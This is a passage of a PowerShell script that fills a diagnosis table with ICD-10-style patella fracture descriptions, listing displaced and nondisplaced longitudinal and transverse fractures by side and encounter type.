fracture of right patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of left patella","Displaced longitudinal fracture of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of unspecified patella","Displaced longitudinal fracture of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of right patella","Nondisplaced longitudinal fracture of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of left patella","Nondisplaced longitudinal fracture of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced longitudinal fracture of unspecified patella","Nondisplaced longitudinal fracture of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of right patella","Displaced transverse fracture of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of left patella","Displaced transverse fracture of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced transverse fracture of unspecified patella","Displaced transverse fracture of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of right patella","Nondisplaced transverse fracture of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of left patella","Nondisplaced transverse fracture of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse fracture of unspecified patella","Nondisplaced transverse fracture of unspecified patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced transverse 